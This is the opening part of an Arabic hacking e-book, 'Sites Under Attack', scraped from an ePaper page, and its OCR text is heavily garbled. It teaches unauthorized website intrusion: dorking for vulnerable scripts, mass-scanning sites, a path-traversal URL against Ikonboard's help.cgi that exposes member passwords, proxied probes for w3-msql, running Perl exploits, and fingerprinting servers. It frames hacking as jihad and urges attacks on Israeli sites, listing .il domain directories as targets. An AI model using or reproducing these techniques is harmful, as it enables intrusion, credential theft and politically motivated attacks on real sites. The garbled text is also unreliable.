27.09.2015 Views

Sites UnDeR UtTaCk www.3asfh.com/vb ١

Sites UndErAttaCk V.1

Sites UndErAttaCk V.1

SHOW MORE
SHOW LESS
  • No tags were found...

You also want an ePaper? Increase the reach of your titles

YUMPU automatically turns print PDFs into web optimized ePapers that Google loves.

hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

<strong>١</strong>


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

المحتویات<br />

. .<strong>١</strong><br />

•<br />

.٢<br />

.٣<br />

.٤<br />

.٥<br />

.htaccess .٦<br />

.٧<br />

.FTP<br />

.٨<br />

.Finger<br />

.٩<br />

.<strong>١</strong>٠ شرحال .secure shell<br />

.<strong>١</strong><strong>١</strong> شرحمعنىال .Buffer Overflows<br />

CGI <strong>١</strong>٢<br />

•<br />

مق دم ة<br />

الف صلالأول ‏((مهارات وم صطلحاتأساسیة))‏<br />

كیفیةالبحثفيالإنترنت.‏<br />

الإختراقالعشوائي.‏<br />

الطریقةال صحیحة والمثلىفياختراقالمواقع.‏<br />

معلومات ع نالDNS‏.‏<br />

شرح ملف<br />

نظام نقلالملفات .FTP<br />

الإختراق عنطریق<br />

بروتوكول خدمة<br />

لا.‏ وعلاقتها بالإنترنت.‏<br />

الف صلالثاني((الحمایة واالتخفي))‏<br />

‎<strong>١</strong>٣‎‏.الأمن و(((التخفي)))فيالإنترنت.‏<br />

<strong>١</strong>٤. حمایة هویتكفيالنت<br />

‎<strong>١</strong>٥‎‏.احمي نفسك وغطي افعالك.‏<br />

.<br />

.<strong>١</strong>٦ حمایةالمنتدیات .<br />

‎<strong>١</strong>٧‎‏.أمنالشبكات.‏<br />

‎<strong>١</strong>٨‎‏.م صطلحات مهمة للمبتدئینفياختراقالمواقع.‏<br />

‎<strong>١</strong>٩‎‏.داینامیكیةتدمیرالمواقع.‏<br />

.<br />

٢٠. شرح برنامجالدرةلتدمیرالمواقع .<br />

‎٢<strong>١</strong>‎‏.تدمیرالمواقع بدون برامج.‏<br />

٢٢. معلومات عن<br />

الف صلالثالث((‏ مقتطفات عنالسیرفرات والأنظمة))‏<br />

‎٢٣‎‏.الإختراق عنطریقالیونیكود الجز ءالأول).‏<br />

‎٢٤‎‏.الإختراق عنطریقالیونیكود الجزءالثاني).‏<br />

٢٥. معلومات عامة عن كیفیةالاستفادة منثغراتالیونیكود<br />

‎٢٦‎‏.الدلیلالكامل لإختراق سیرفر .IIS<br />

‎٢٧‎‏.دراسة مف صلة وبعمقفيالUniCode‏.‏<br />

‎٢٨‎‏.تدری ب على عملیةالإختراق بواسطةالیونیكود.‏<br />

‎٢٩‎‏.در س مف صل ع نالكوكیز.‏<br />

.Routing in the Internet<br />

Shadowلتحلیلالموقع Scan Security .<br />

)<br />

)<br />

) متوسط (.<br />

)<br />

)<br />

•<br />

٣٠. معلومات مهمة عنالموا قعالتيتدعمالفرونت بیج.‏<br />

س&ج>)فياختراقالمواقعبثغرةالفرونت بیج.‏<br />

٣٢. شرح برنامج<br />

‎٣٣‎‏.اماكن وجود مل فالباسوردفيأنظمةالتشغیل.‏<br />

‎٣٤‎‏.اختراقالموقع الجزءالأول).‏<br />

‎٣٥‎‏.اختراقالمواقع الجزءالثاني).‏<br />

‎٣٦‎‏.در سفياختراقالمواقع<br />

‎٣٧‎‏.اختراقالSQL‏.‏<br />

‎٣٨‎‏.در س مف صل ع نالSQL‏.‏<br />

‎٣٩‎‏.در س لإحترافالهاكفياختراقالمواقع.‏<br />

‎٤٠‎‏.استغلال لینك سفياختراقالمواقع.‏<br />

٤<strong>١</strong>. شرح مف صل منالألف إلىالیاءفياحترا فاختراقالمواقع عنطریق لینك س<br />

.<br />

>) .٣<strong>١</strong><br />

‎٤٢‎‏.درس عنالShell ) PHP<br />

‎٤٣‎‏.درس عنالShell ) PHP<br />

الجزءالأول).‏<br />

الجزءالثاني).‏<br />

٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

‎٤٤‎‏.درس عنالShell PHP ‏(الجزءالثالث).‏<br />

.٤٥ شرحأداة .anmap<br />

٤٦. طریقةلإقتحامالسیرفرات بدونثغرات<br />

.<br />

.<br />

.<br />

.Cross Site Scripting .٤٧<br />

‎٤٨‎‏.كودتدمیر سجلالزوار.‏<br />

٤٩. شرح شبه مف صل ع نالثغرات<br />

‎٥٠‎‏.كیفتستخدمالثغرات.‏<br />

‎٥<strong>١</strong>‎‏.تمتعبإ ختراقالمواقعالإسرائیلیة مع ه ذهالثغرة<br />

‎٥٢‎‏.ثغرة نیوك.‏<br />

‎٥٣‎‏.ثغرة .Chunked<br />

‎٥٤‎‏.اختراقالمنتدیات من نوع<br />

.vBulletin2,2,0<br />

‎٥٥‎‏.ثغرةفي منتدیات‎2,2,9‎ .vBulletin<br />

‎٥٦‎‏.اختراق منتدیات<br />

‎٥٧‎‏.ثغرة جمیلةفي phpفيالمواقع.‏<br />

‎٥٨‎‏.ثغرةفي<br />

‎٥٩‎‏.ثغرهفي<br />

‎٦٠‎‏.ثغرةفي نو ع XMB م نالمنتدیات.‏<br />

.٦<strong>١</strong> شرحثغرة .philboard<br />

.phpbb 2.0.0<br />

.php nuke<br />

.Bandmin 1.4<br />

.٦٢ شرحثغرة .uploader.php<br />

‎٦٣‎‏.أف ضلالمنتدیاتالعربیة للهاكر .<br />

‎٦٤‎‏.أف ضل مواقعالأمن والهاكالإنجلیزیة.‏<br />

‎٦٥‎‏.الخاتمة.‏<br />

٣


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

....<br />

....<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

بسماالله الرحمن الرحیم<br />

الحمد الله ربالعالمین والصلاة والسلامالأتمانالأكملان على سیدالثقلان وهاديالانس والجان نبینا محمد<br />

سید ولد عدنان وعلى اله وصحبة وسلمتسلیماكثیرا<br />

من منطلقاهمیة هذا العلم والذي ن حنفياحوج ما نكونالیهالانفي وقتناالحالياحببناان یكونلنا<br />

نصیبفي الجهادالااالله بقدر ما نستطیعفكان هذا الكتاب بذرة عملنا المتواضع هذا والذي نسألاالله یوفقنا<br />

وان یسددنالمافیهالخیر والنفعلكل منارادانیعلي دینااللهفي هذاالمجالفلقدتكالب تاعداءاالله علینا<br />

منكل جانب وبدأت الحروبالالكترونیةتغزونا منكل صوب وناحیةفیجبالاستعدادللمواجهة واعداد<br />

العدة من مطلققولااللهتعالى ‏((وأعدوالهم مااستطعتم منقوة ومن رباطالخیلترهبونبه عدواالله<br />

وعدوكم ‏))فاحببناان نبدأفي سلسلةتعلیمیة هدفها ماقد ذكرناه سابقا منتقدیم ید العون والمساعدةبما<br />

فتحاالله علینا وعلىاخواننا حتى نكون یدا واحدة علىاعدائنا<br />

فاحببتفي هذا الكتابالتركیز على دراسة هذاالعلم دراسة وافیة والابتعاد عنكل ما یسمىبالبرامج<br />

فضررهااكبر من نفعها ولنبدأ سویةبالدراسةالوافیةالمركزة والمتقنه علىالانظمة والشبكات<br />

والسیرفرات والتوسعفیهافهي طریقناللسیطرةالالكترونیة وحمایةانفسناقبلكل شئفي هذا العالم<br />

المفتوحالذي یسیطر علیهقراصنة الاحتكار منأعداءاالله (......) .<br />

ولقدبدأنا ولا ندعيالكمالفمنارادتقدیمالمساعدةاو مد یدالعونباي مشاركةكان تفلهالاجر والثواب<br />

منااللهتعالى سواءباقتراحاو نصیحةاو مشاركة موضوعیةاو ‏...الخ<br />

<strong>Sites</strong> Under<br />

....<br />

-- مواقعتحتالهجوم -- ))<br />

...<br />

وهذا هوالجزء الأول من هذاالكتابالذياطلقنا علیهاسم<br />

((Attack وترقبواالجزء الثانيقریبا وفيانتظاراقتراحاتكم وماتجودبهانفسكمفي خدمة دینكم<br />

واخیرافانا نبریئ ذمتنااماماالله منكلاستخدام سئلما سنقدمهلكمفهو سلاح ذو حدین ‏....اللهم هل<br />

بلغنااللهمفاشهد<br />

ولقد نویناانتكونالمواضیعكلها من كتاباتنافأضفنا مواضیع من كتاباتنا ولكن رأینا منالاخوة ممنقد<br />

فتحاالله علیهمفي بع ضالمجالات وما كتبوههوأفضل مما سنكتبهفي بع ضالمواضیعلذلكتمارفاق<br />

مواضیعهمكما هي من غیرتعدیلالا مایتعلقبالتعدیلاتاللغویةاوالاخطاء الواضحة<br />

اذنفنصیبنا منالمواضیع ما یقارب ٤٠% والبقیةهي من نصیباخواننا ونسالااللهلهمالاجر والمثوبة<br />

على ماقدموه منمعلومات ستخدمامتهم ودینهمالىانتقوم الساعة<br />

وتقبلوات حیاتاخوانكم<br />

جمیعالحقوق محفوظةل:-‏<br />

.....<br />

....<br />

+++++++++++++++++++<br />

+ hi_HaCkEr –<br />

+ MaXhAk2000<br />

+++++++++++++++++++<br />

أبو مجاهد<br />

منتدیات العاصفة<br />

وااللهالموف ق،،،‏<br />

http://<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong> ****<br />

٤


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

الفصل الأول<br />

<br />

‏((مهاراتوصطلحات<br />

أ ساسیة))‏<br />

٥


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

كیفیة البحث في الإنترنت<br />

"<br />

"<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

.<br />

$$$$$$$$$$$<br />

الكاتب:بلاكهنتر<br />

$$$$$$$$$$$<br />

......<br />

لأهمیة هذاالموضو عبالنسبةلكل مخترق مواقعلكي ی حصل على ما یرید من مراجع حول نظاممعیناو<br />

برنامجمعیناوثغرةمعینةفهو مناكثرالناساستخدامالمحركات البح ث واسالوا مخترقيالمواقع عن<br />

اهمیة محركات البحثبالنسبةلهم .....<br />

ولابدانتعلمان محركاتالبحث ما وجدتاصلاالالأجلك لت حصل على ماترید وباقصر وقت ممكن ولابد<br />

انتعر فایضاانا غلبها متخص صفي مجالمعین علىالأغلبفلاتبح ث مثلا عنبرامج هكرفي محركات<br />

ب حث سیاسیة مثلا وهكذا ......<br />

بالنسبه مثلاللجوجلانااعتبرهالمحركالذكيفهویعر ف ماذا كتبت وانكنتقدأخطأتفي كتابة الكلمة<br />

فهوتلقائیا سیعطیكفي بدایةنتائج البحث سؤال ‏...هلانتتقصدكذا ... و غالبا ماتجدالذيكنتتب حث<br />

عنهفياوائل صفحاتنتیجة البح ث<br />

بالنسبهللیاهوهوایضا ذكي ولكن ذكائهیعتبر ذكاءتجاري حیثانه یقدملكالمواقع التجاریهالتيیتعامل<br />

معها وفیها ماكنتتب حث عنهثم المواقعالتجاریه ا لتي لایتعاملمعها المحركثمالمواقعالعامه وهي ما<br />

كنتتب حث عنه<br />

سؤال ‏/الكثیر منالناس واناالاحظهاكثیرافمثلا عنديفيالمنتد ى وكذلكفي جمیعالمنتدیا تاجدالكثیر<br />

مثلا یطلب مثلابرنامجالسب سفن ‏!!!!!!!!لماذ ؟ هذا مثال عنأشهربرنامجاختراق والامثلةكثیرة<br />

حسنا ‏...قليانت مالفر قبینك وبینالشخ صالذيتطلب منهبرنامجاو موقعمعیناو غیره وهو یستطیع<br />

ایجاده وانت لاتستطیع ؟؟؟<br />

صح ‏//الفر قبینك وبین هذاالشخ ص ‏..ان هذاالشخ صیتمیز عنكبانه یجید التعامل مع محركاتالب حث<br />

على عكسكتماما<br />

الان سنقومبشرح الطریقة المثلى لعملیةالبح ث<br />

طریقهبسیطه جدا وهي عبرتقسیمالمواقعالى<br />

مواقعتجاریه ولها محركاتبح ث مهتمةبها<br />

مواقعبرامج ولها محركاتبح ث مهمةبها<br />

مواقع ملتیمیدیا ولها محركاتبح ث مهتمةبها<br />

مواقع سیاسیه واخباریه ولها محركاتبح ث مهتمةبها<br />

مواقع هاك ولها محركاتبح ث مهتمةبها<br />

مواقعكراك ولها محركاتبح ث مهتمةبها<br />

مواقع سكیوریتي ولها محركاتبح ث مهتمةبها<br />

مواقع هاردویر ولها محركاتبح ث مهتمةبها<br />

منتدیات ولها محركاتبح ث مهتمةبها<br />

وانا افضل دائما محركبحث جوجل لتوفر جمیع المجالات ضمنهتقریبا ولسوابقةالمشهودلهبها منكل<br />

هكرفهوبالنسبةلي افضل موقعلكل هكر<br />

طیبالاناذاأردت الب حث عنبرنامجمعین ما هيافضل واسر عالطر قللوصوللهذا البرنامج ؟<br />

انا متأكدبانكلوفكر تقلیلا ستجیب عليبهذاالاجابة ...<br />

....<br />

:<br />

:<br />

.....<br />

....<br />

٦


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اولااذهبالى مواقع الب حث عن البرامج وأضعاسمالبرنامج المطلوب وفي نهایةاسمالبرنامجأضع<br />

الامتداد الذي غالبا ماتكون علیه هذهالبرامج<br />

أو<br />

مثلااناابح ث عنثغرهأعر ف نوعها ولكني لاأعر ف مصدرها وارید مرجعلها لزیادةالاطلا ع ماذاأفعل<br />

؟؟؟<br />

ولتكن مثلاثغراتال<br />

اذهباولالمواقعالسكیوریتياب حث عنكلمة XSS ستكونلدیكنتیجةبح ث لا بأسبها عن كل مایتعلق<br />

بها<br />

الجوجل سیعطیناكمیةكبیر منالمواقع والمراجعالمتعلقةبما نبحث عنهلذلك یجبان نضیق نطاقالب ح ث<br />

حول المطلوبفق ط ولذلك علي بتحدید البح ث بعلامه ) + ( واذااردت فعلياناب حث عنبجز Bugs و<br />

اكسبلویتباسم الثغره فعليان اكتب :<br />

مثلاابحثعن ثغرات IIS سأكتب<br />

وهكذا<br />

الان ساضعلكم مجموعه منالمواقعالتيقدتفیدكمفي عملیةالبح ث :<br />

prog.exe<br />

CSS واللياختصارها XSSاو Cross Site Scripte<br />

Prog.zip<br />

أواذهب الى جوجل واكتب xss+ exploit + bug<br />

XSS+BUG+EXPLOIT<br />

IIS+exploit+bug<br />

:<br />

اناأسمي هذا الموقعبخادم الهكرز وسید الهكرز وووووكل ما ست طلقه على هذاالموقعفهو یستحقأكثر<br />

/http://www.google.<strong>com</strong> :<br />

محركاتبحث عادیه ومتقدمه<br />

/http://www.altavista.<strong>com</strong> - /http://www.yahoo.<strong>com</strong> :<br />

/http://hotbot.lycos.<strong>com</strong> - /http://www.lycos.<strong>com</strong> -<br />

- http://news.bbc.co.uk/hi/arabic/news :<br />

http://www.aljazeera.net/ - http://arabic.cnn.<strong>com</strong>/<br />

مواقع سیاسیه واخباریه<br />

مواقع سكیوریتي :<br />

- http://www.securiteam.<strong>com</strong>/<br />

- http://www.ussrback.<strong>com</strong>/ - http://www.securityfocus.<strong>com</strong>/<br />

- http://www.ntsecurity.nu/ - http://www.ntbugtraq.<strong>com</strong>/<br />

http://www.ntsecurity.<strong>com</strong>/<br />

وأناتصلنياخرالثغرا ت علىبریدي من خلالالاشتراك یقوائمهم البریدیة وأنصحالجمیعبالاشتراكفي<br />

قوائمهمالبریدیة<br />

http://drivers.online.net.nz/<br />

- http://www.asus.<strong>com</strong>/ - http://nvidia.<strong>com</strong>/<br />

http://www.amdmb.<strong>com</strong>/ - http://intel.<strong>com</strong>/ -<br />

+++++++++++++++++++++++++++<br />

:<br />

مواقع هاردویر :<br />

أیضا هنالك بع ضالمهارات المهمةفيالتعامل مع محركاتالب حث<br />

‏*-*البحث ضمننتائجالبح ثالحالیة ..... تتیح بع ض محركات البح ث هذهالخاصیة واقرب مثال جوجل<br />

حیثاني مثلالكيأب حث عنثغرةمعینةفانياكتب مثلا exploit ثم بأسفلالصفحة ستجد خیارالب حث<br />

ضمن النتائ جالحالیة ‏....فاب حث عنثغرتك ضمن هذه النتائجالموجودةفمثلااكتب list.php3 لتعر ف<br />

الثغرة الموجودة ضمن هذاالبرنامج<br />

‏*-*أیضااستخدم + و ‏–فمثلا<br />

Exploit + bug + anyprog<br />

فانالنتائج لابدانتحتوي على جمیعالكلماتالثلا ثفي جمیع النتائج<br />

.... وهكذا<br />

٧


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

Exploit - bug - anyprog<br />

فانكتخبرهبان النتائج یست حسنانتكونتحتوي على هذه الكلماتالثلا ثفانلمفضع الموجود سواء<br />

كلمتیناوكلمة<br />

..<br />

*-* " أقوى منتدیات هكر "<br />

عند الب حث عن مجموعةكلمات وبنفسالترتیبفاننا یجبان نحددها بقوسین صغیرینكالمثال الذي<br />

بلأعلى ... وهكذا...‏<br />

٨


hi_HaCkEr & MaXhAk2000<br />

"<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

:<br />

" الإختراق العشوائي<br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

$$$$$$$$$<br />

الكاتب :<br />

$$$$$$$$$$<br />

الكندور<br />

-<br />

ماهو الإختراق العشوائي Random Hacking<br />

‏-تطویرهب حیث یصبح یب حث على إ ستثمارات غیرال<br />

‏-كی فتستغلايثغره بعدال حصول علیها<br />

CGIScripts<br />

^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^^<br />

- ماهو الإختراق العشوائي Random Hacking<br />

هوالبحثفيكمیهكبیره من المواقع عنثغره محدده ، وهذا سهل ویعودبمواقعكثیره جدا جاهزه<br />

للإختراق ، مثالبسیط جدا ، روح على محركب حث ، من محركاتالبح ثالتيتعتمد علىال spidersأو<br />

إرجعلشرح زوروفي ریاضیات<br />

العناكب مثل altavista.<strong>com</strong> وأكتب<br />

الب حث)‏ مثلا نب حث عنلنكلملفبإسم<br />

كلهاتملك منتدى ،Ikonboard إفتح واحد منها وأبحثفيالمصدر الكود HTML عنالسكربت الذي<br />

بحثت عنه help.cgi لتعر فاین مكانه ‏،لنفر ض مكانههنا<br />

أكتب بعدالملف غیر العنوانلیصبح<br />

) ، link:xxxx.cgi or pl<br />

help.cgi ، link:help.cgi المواقعالمردودهلكنتیجهللب حث<br />

http://www.example.<strong>com</strong>/cgibin/help.cgi<br />

http://www.example.<strong>com</strong>/cgibin/help.cgi?helpon=../members/[member].cgi%00<br />

[]<br />

Ikonboard<br />

مع ملاحظهتغییر ‏[‏member‏]بإسم عضو وبدون القوسین طبعا<br />

سو فیعر ضلكمعلوماتالعضوكامله ومن ظمنهاكلمة المرور وهذه الثغرهل المنتدى<br />

2.1.7 وهذالیسلب موضوعي ولكن هيبدایه ومثال لاتحفظهلأنيأحضرتأبس ط مثالفقطفیوجد غیره<br />

مئاتبل آلا ف ملفاتال CGIScriptتملكثغرات مثل هذه واغلب إ ستثماراتهاتكون من خلال<br />

لل حصول على مثل هذه ا لإ ستثماراتلثغرات ملفاتالسي جي آي سكریبت شو فالأرشی ف هذا وهولغته<br />

روسیهأعتقد ولكن ما یهملأننا نب حث عنال Exploitأو ا لإ ستثمار<br />

/http://www.secure.f2s.<strong>com</strong>/eng_ver/bugs<br />

وممكنتأخذإسمالمنتج مثلاوتضعهفي محركالب حثل /http://www.securiteam.<strong>com</strong><br />

وتشو فالنتائج ‏،أوتشتركفيالقائمهالبریدهل سیكیورتيفوكسفهي مفیده جداأنا شاركت منقبل فتره<br />

url<br />

وجداأعجبتبها وهي مختصهفيالأمن ولیسلثغراتالسي جي آ ي سكربت،‏ یعنيامن واخبار وكل شئ<br />

.... ویوجدبرنامجتقدمه سیكیورتيفوكسيبإسم سیكیورتيفوك سبیجر ، هوبرنامج لتسهیل عملیه<br />

ال حصول على الأخبار ووو...‏ الخ<br />

‏-تطویرهب حیث یصبح یب حث على إ ستثمارات غیرال<br />

!!<br />

CGIScripts<br />

(:<br />

ا لإختراقالعشوائيإ ذاكان فعلا عشوائي،‏ یعنيتخترقاي موقع ولوبدون سببفهذههمجیه ‏،لكن<br />

ممكن نستفید منهإ حنافيأنه ما یكونفي شكل همجي ‏،أنااقوللككی ف ، مثلاإسرائیلالليالكل یكرهها<br />

، الذین یأمرونالفلسطینیین بأوقا فإ طلاق النار ‏،الكل یكرههملی سلأجلأنهم یهود ، لا نكرههملأنهم<br />

ظلموافلسطین ، عندهم موقعفیه آلا ف من مواقعهم هذاهو<br />

sitesتنتهيب <strong>١</strong>٢٦<strong>١</strong>٠ co.il و <strong>١</strong><strong>١</strong>٠٤<br />

٩


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong><br />

<strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

sites‏.تنتهيب gov.il وهذه مهمه ، و<br />

sitesتنتهيب sitesتنتهيب<br />

sites‏.تنتهيب<br />

و.‏<br />

sites‏.تنتهيب<br />

و.‏ .il - sites ‏........عشانت حصل علىكل هذه السایت روح الموقع هذا<br />

ac.il و ٧٨<br />

org.il و ٧٠<br />

muni.il و sitesتنتهيب ٢٠٠٩ ، <strong>com</strong> و<br />

sites‏.تنتهيب ٥٤ net.il و ٢٩<br />

israel.net - 84 ، لعینه .edu - 4 sites org - 121 sites و net<br />

<strong>١</strong>٣٧<br />

sites<br />

http://iguide.co.il/sites/sites.htm<br />

وفیهكمان محركاتب حث<br />

/http://www.achla.co.il<br />

http://www.reshet.co.il/data/index.vs?dw=1<br />

/http://www.maven.co.il<br />

/http://www.tapuz.co.il<br />

/http://www.walla.co.il<br />

http://www.info.gov.il/find.pl<br />

وفیه محركأعدم منها والليهو<br />

altavista.co.il<br />

المهم علىكل شخ ص مناأن یصلحفرزللبیاناتالموجودهفي هذهالمواقع ، یستخدم اللغهالتي ی تقنها<br />

لیصنعبرنامج یصلحفرز ویضعهافي مل فتكستبدوناشیاءثانیهمعها<br />

/w 3 - msql<br />

العملیهالثانیههيالب حثفیهاكلها عن منتج ، مثلا ‏،الطریقه سهله جدا ‏،أولایتمالشبك مع<br />

بروكسي مثلا 8080: proxy.isp.net.sa وثم یرسللهأمر ، GET مثلاترسلللبروكسي<br />

cgi-<br />

GET http://www.<strong>com</strong>.il/cgi-bin/w3-msql/ HTTP/1.0<br />

*/* ،Accept: image/gif, image/x-xbitmap, image/jpeg, image/pjpeg<br />

Accept-Language: ar-sa<br />

(User-Agent: Mozilla/4.0 (<strong>com</strong>patible; MSIE 5.5; Windows 98<br />

Host: www.<strong>com</strong>.il<br />

Proxy-Connection: Keep-Alive<br />

وهو یطلب من البروكسيأحضارالموقع http://www.<strong>com</strong>.il/cgi-bin‏/،یتضح طلبنال<br />

‏،فيالحقیقه لا نب حث عنثغرات سي جي آي ، ولكن نب حث عنكل المواقعالتي یوجد<br />

بهاالمنتج ،WWWMSQL یعنيالمواقعالإسرائلیه مثلاالتي جمعناهافي مل فتكس تكلهاتأخذ واحد<br />

وثم یحفظ<br />

واحدوتدخلفي البرنامج الذي صممناهوترسل الى البروكسيبحثا عن<br />

ردالبروكسيفي مل ف خارجي ، وهكذا حتى ننتهي منكلالمواقع ، وثم نفتحالمل ف ونشو فالتيتمإیجاد<br />

المنتج WWWMSQL داخها والتيلم یوجد ، ونتوجهالى سیكیورتيفوكس والا سیكیورتيتیم والاأي<br />

موقع یعجبك واب حث عن ، w3-msql مثلافي سیكوتيتیم نجد Exploitل<br />

منالمتصفح ، وهو هنا<br />

http://www.securiteam.<strong>com</strong>/exploits/2WUQBRFS3A.html<br />

cgi-bin/w3-msql<br />

w3-msql یمكنتطبیقه<br />

/bin/w3-msql<br />

<strong>١</strong>٠


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

طریقهفح ص عده مواقعبحثا عن منتجفیهاأسمیهاانا Randomیعنيإختراق Hacking عشوائي ،<br />

ولكنلو فعلابحثت عن wفيالمواقعالإسرائلیهفأنا 3 - msql أقوللك بأنك ما را حتلقىكثیرأولنتجد<br />

شئ ، ممكنتب حث عن /vti_pvt_/ لترصدكل المواقع التيفیهافرون تبیج ، وطبعا بعد مایتم حفظكل<br />

المعلوماتالمسترجعه من البروكسيتكونبشكل HTML عشانكذاأنت خل المل ف یكونبنسق<br />

وافتحهوتجدكل المواقع ‏،اللي كتب عنها<br />

الخ ، من هذهالردودتعر فاللي نتفاوند والا موجود ولكن<br />

غیر مسموحبالوصولله الخبهذهالطریقهتعر ف اللي موجود علیه واللي مو موجود ‏.....والباقي علیك<br />

html.*<br />

displayed.. The page cannot be واللي<br />

.... not found.... واللي Forbddien<br />

..<br />

‏-كی فتستغلايثغره بعدال حصول علیها؟؟<br />

إ ذاكانت url ما یبغالهافلسفه ‏،كود c وما عرف تتشغلهأوقابل تفیهأخطاءفممكنتب حث عنفرجون<br />

ثانيله ولكنبلغه perlأو Shell *.sh وهوالذي یقابل Batchفي ویندوزوتحدثنا عنهافيكوكب<br />

لغاتالبرمجه ، من الدوس بعد ماتثبتأكتی فبیرلأكتب perlإ exploit.pl ذاكان ال exploitبلغه<br />

بیرل ولكن طبعافیهأشیاءتغییرهافيالكود نفسه ، وهذهالأشیاءتكون مكتوبهبین علاماتالتعلیقات<br />

وأكید بتواجه مشاكلإ ذا ماتعر ف شئفيبیرل ‏،في هذهالناحیه لاتطلب شرحبالصور ‏:)إ ذا رجعلك رد<br />

طویل ماقدرتتقراه ممكنتحفظالخرج عن طریق علامة > وثم مسافه وإسم المل ف مثلا<br />

(:<br />

perl<br />

exploit.pl > log.htm<br />

وبالنسبهللمنتجأكتی فبیرلفقطتواجهفیه مشاكل ‏،لأن بع ض ال Exploit كتبفيالإ صدارأربعه<br />

وممكن خمسه وممكن مایعمل زینفيأكتای فبیرللذلكقدتضطر لتغیر المفسر عندكأوتعدلفيالكود<br />

فیه مفسربیرل ممتاز<br />

وهذاكله یطلب خبرهفياللغه ، وعلىفكرهلیونكس أعمل على<br />

جداافضل منأكتی فبیرل بعشراتالمرات...‏<br />

( RedHat 6.2<br />

)<br />

<strong>١</strong><strong>١</strong>


hi_HaCkEr & MaXhAk2000 <strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

"<br />

الطریقة الصحیحة والمثلى في اختراق المواقع<br />

"<br />

...<br />

$$$$$$$$$$$$$$$<br />

الكاتب marwan911:<br />

$$$$$$$$$$$$$$$$<br />

اول خطوةفيالاختراق واللي هياخذالمعلومات<br />

یعنينعر ف الموقع الفلاني شنهوالملقماللي شغال علیه والنظام والخدماتاللي یدعمها.‏<br />

الملقماتاشهرها اثنین ::<br />

:IIS من مایكروسوفت وهذه ملیانةثغرا ت.‏ ‏(ومواقعقلیل مقفلةثغراتها)‏<br />

:apache من مجموعة مبرمجین متوزعینفيانحاء العالم واختراقها شبهصعب.‏<br />

طیب<br />

ال حین عندنا موقع<br />

وشلوننعر ف نظامالتشغیل والملقم والخدمات والمعلوما تكلها<br />

عندك الموقع http://www.netcraft.net<br />

ادخله<br />

تلاقي مربع<br />

هنات حطفیه الموقع الليتبيتعر فالمعلومات الليفوق<br />

مثلا نحط موقعالبیتالابی ض اللي هو whitehouse.org<br />

ملاحظة:‏ نكتبه من غیر //:http ولا ‏/الليبالا خیر<br />

http://uptime.netcraft.<strong>com</strong>/up/graph....whitehouse.org<br />

را ح یطلعلناالتالي<br />

The site www.whitehouse.org is running Microsoft-IIS/5.0 on Windows<br />

2000<br />

طیب<br />

ال حین عرفنامعلومتین مهمتین<br />

<strong>١</strong>٢


hi_HaCkEr & MaXhAk2000<br />

<strong>Sites</strong> <strong>UnDeR</strong> <strong>UtTaCk</strong> <strong>www.3asfh</strong>.<strong>com</strong>/<strong>vb</strong><br />

اول شيءانه شغال علىالملقم<br />

IIS5.0<br />

ثاني شيء شغال على نظام ویندوز<br />

حلو<br />

٢٠٠٠<br />

IIS5.0 علیه<br />

اول شيء نجربثغرات ‏(راحاحطها بعدالموضو ع)إ ذا مانفع شيء نشو فثغرات نظام<br />

ویندوز ٢٠٠٠ ‏(راحاح طالموقع بعد الموضو ع)‏<br />

طیب ..... ال حینفیه حاجةاسمها یونيكود ‏......هذهتختر قفیها عن طریقالمتصفح<br />

وماتمشيإلا مع ملقمات IIS وهي عبارة عن عناوین طویلةت حطها بعد عنوانالموقع.‏ راحاحطامثلة<br />

علیها.‏<br />

طیبلنفر ضانه ماطلعفیهاثغرا ت؟<br />

نشو ف محتویاتالموقع نفسه<br />

نشو فإنكان عنده سجل زواراو منتد ىاواواو ونطلعثغراتها منالموقع اللي راحارفقهفي الرداللي<br />

بعدالموضوع.‏<br />

طیبلوكانالسیرفراباتشي؟<br />

خلونا ناخذ مثال موقعارانك arank.<strong>com</strong>.www<br />

لو حللناهبالنیتكرافت را ح نشو فالنتیجةالتالیة<br />

The site www.arank.<strong>com</strong> is running Apache/1.3.20 (Unix)<br />

mod_gzip/1.3.19.1a mod_perl/1.26 mod_bwlimited/0.8 PHP/4.0.6<br />

mod_log_bytes/0.3 FrontPage/5.0.2.2510 mod_ssl/2.8.4 OpenSSL/0.9.6<br />

on Linux<br />

طیب هنا یهمناثلا ثاشیاء<br />

طیب<br />

